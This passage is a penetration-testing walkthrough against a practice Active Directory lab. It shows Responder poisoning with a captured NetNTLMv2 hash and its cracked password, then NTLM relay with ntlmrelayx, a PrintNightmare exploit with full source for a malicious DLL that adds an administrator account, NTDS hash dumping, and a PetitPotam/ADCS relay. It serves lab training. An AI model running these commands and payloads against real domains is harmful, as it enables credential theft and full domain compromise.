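    for e in entries:
        name = e.get("samaccountname", [""])[0]
        uac = int(e.get("useraccountcontrol", ["0"])[0])
        if not name or uac & UF_ACCOUNTDISABLE:
            continue
        if uac & UF_DONT_REQUIRE_PREAUTH:          # AS-REP roastable
            findings.append((name, "no-preauth"))
        if e.get("serviceprincipalname") and not name.endswith("$"):
            findings.append((name, "user-spn"))    # Kerberoastable user account
        if any(SECRET_HINT.search(d) for d in e.get("description", [])):
            findings.append((name, "secret-in-description"))
    return findings
```

Each finding maps to a fix: require pre-authentication, move services to managed service accounts or give them long random passwords, and clear secrets from description fields.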

Relay and Poisoning

Responder

In the lab, there are two bots that simulate LLMNR, MDNS and NBT-NS requests. One user has a weak password but no admin rights. Another user has admin rights but uses a strong password.

sudo python3 Responder.py -I vboxnet0 # Wait 5 minutes

robb.stark::NORTH:1122334455667788:138B29A14C5A082F19F946BB3AFF537E:01010000000000000090C5E56494D801E5D2F5789054B95D0000000002000800480053003600340001001E00570049004E002D004C00420052004E0041004D0031005300540051005A0004003400570049004E002D004C00420052004E0041004D0031005300540051005A002E0048005300360034002E004C004F00430041004C000300140048005300360034002E004C004F00430041004C000500140048005300360034002E004C004F00430041004C00070008000090C5E56494D801060004000200000008003000300000000000000000000000003000002D4B5557B9EF589ECE5944B06785A55D686F279D120AC87BCBF6D0FEAA6663B90A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000
eddard.stark

The bot tries to make an SMB connection to bravos instead of braavos. DNS doesn't know bravos (with a single 'a'), so by default Windows sends a broadcast request to find the associated computer. With Responder we answer that broadcast query, claiming to be that server, and so we receive the connection from the user.

The NetNTLM hashes are not usable to do pass the hash, but you can crack them to retrieve the password.
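
The captured response also records which service the client asked for: in robb.stark's blob above, the TargetName AV pair decodes to cifs/Bravos. The parser below is an added example (not from the original writeup or from Responder) that extracts those fields from a NetNTLMv2 line so the misspelled name can be traced and fixed; the sample line is constructed and known_hosts is a hypothetical list of valid host names.

```python
import struct

# AV pair IDs from MS-NLMP
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
TEXT_IDS = {1, 2, 3, 4, 5, 9}     # values stored as UTF-16LE strings

def build_sample():
    """Constructed user::domain:challenge:proof:blob line, not a real capture."""
    def av(av_id, data):
        return struct.pack("<HH", av_id, len(data)) + data
    blob = bytes.fromhex("0101000000000000")        # RespType, HiRespType, reserved
    blob += struct.pack("<Q", 133000000000000000)    # FILETIME timestamp
    blob += bytes(range(8)) + b"\x00" * 4             # client challenge, reserved
    blob += av(2, "HS64".encode("utf-16-le"))
    blob += av(9, "cifs/Bravos".encode("utf-16-le"))
    blob += av(0, b"") + b"\x00" * 4                  # end-of-list marker, padding
    return "robb.stark::NORTH:1122334455667788:" + "AA" * 16 + ":" + blob.hex().upper()

def parse_netntlmv2(line):
    """Decode the metadata of a NetNTLMv2 line; the proof itself is left untouched."""
    user, _, domain, challenge, _proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge blob")
    (filetime,) = struct.unpack_from("<Q", blob, 8)
    info = {"user": user, "domain": domain, "server_challenge": challenge,
            "unix_time": filetime // 10_000_000 - 11_644_473_600, "av": {}}
    off = 28                                  # AV pairs follow the 28-byte header
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:                        # MsvAvEOL
            break
        if off + av_len > len(blob):
            raise ValueError("truncated AV pair")
        data = blob[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"Unknown({av_id})")
        info["av"][name] = data.decode("utf-16-le") if av_id in TEXT_IDS else data.hex()
    return info

def unresolvable_target(info, known_hosts):
    """Return the requested host when it is not a name the domain's DNS knows."""
    host = info["av"].get("TargetName", "").partition("/")[2].lower()
    return host if host and host not in known_hosts else None
```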

Cracking with hashcat

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Found credentials of Robb Stark when cracking hash.
NORTH\robb.stark:sexywolfy

With Robb Stark we pwned the NORTH domain: he is an Administrator of Winterfell (North DC).

NTLM Relay

Unsigned SMB

netexec smb 192.168.56.0/24 --gen-relay-list relay_hosts.txt

Now we have a list of computers with signing:False

Responder + NTLMRelayx – SMB

Before starting Responder to poison the answers to LLMNR, MDNS and NBT-NS requests, we must stop Responder's SMB and HTTP servers: we don't want to capture the hashes directly, we want to relay them to NTLMRelayx.

sed -i 's/HTTP = On/HTTP = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'HTTP ='
sed -i 's/SMB = On/SMB = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'SMB ='

Start Responder (check that HTTP and SMB are Off)

sudo python3 Responder.py -I vboxnet0

Start NTLMRelayx

impacket.ntlmrelayx -tf relay_targets.txt -of netntlm -smb2support -socks
  • -tf : list of targets to relay the authentication
  • -of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
  • -smb2support : support for smb2
  • -socks : will start a socks proxy to use relayed authentication

If you get a Jinja2 error, try:
pip3 install Flask Jinja2 --upgrade

The poisoned connections are relayed to castelblack (192.168.56.22) and essos (192.168.56.23), and a SOCKS proxy is set up to use the connections.

As eddard.stark is a domain administrator of north.sevenkingdoms.local, he got administrator privileges on castelblack.

Now we can use this relay to get access to the computer as an administrator.

MITM6 + NTLMRelayx – LDAP

(Pending)

Domain Enum with credentials

Check MachineAccountQuota (by default any user can create 10)

netexec ldap winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M maq

  1. Add new computer
impacket-addcomputer -computer-name 'samaccountname$' -computer-pass '1Qwerty(' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'

  2. Delete SPN
python ./krbrelayx/addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'

  3. Change the machine name
python ./krbrelayx/renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing

(Pending)

PrintNightmare

netexec smb 192.168.56.0/24 -M spooler

impacket-rpcdump 192.168.56.10 | egrep 'MS-RPRN|MS-PAR'

Prepare malicious dll

nightmare.c

#include <windows.h> 

int RunCMD()
{
    system("net users jolmedo 1Qwerty! /add");
    system("net localgroup administrators jolmedo /add");
    system ("net localgroup \"Remote Desktop Users\" jolmedo /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2support

Download and execute exploit

git clone https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.100.223\smb\nightmare.dll'

Testing new user

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /v:meeren
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'
xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /v:meeren

Exploit Windows Server 2019 – Winterfell

The above exploit works but does not add the user to the admin group because it is caught by Windows Defender.

https://github.com/newsoft/adduser

adduser.c

x86_64-w64-mingw32-gcc -shared -o nightmare.dll adduser.c -lnetapi32
sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2support
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'

Dumping all hashes

netexec smb winterfell.north.sevenkingdoms.local -u jolmedo -p '1Qwerty!' -M ntdsutil

Don’t forget to clean 🧹

Connect RDP

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /d:north /v:winterfell

You will find your dlls inside:

  • C:\Windows\System32\spool\drivers\x64\3
  • C:\Windows\System32\spool\drivers\x64\3\Old\{id}\

ADCS

ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

https://github.com/topotam/PetitPotam

python petitpotam.py 192.168.100.223 meereen.essos.local 

This attack does not work on an updated AD.
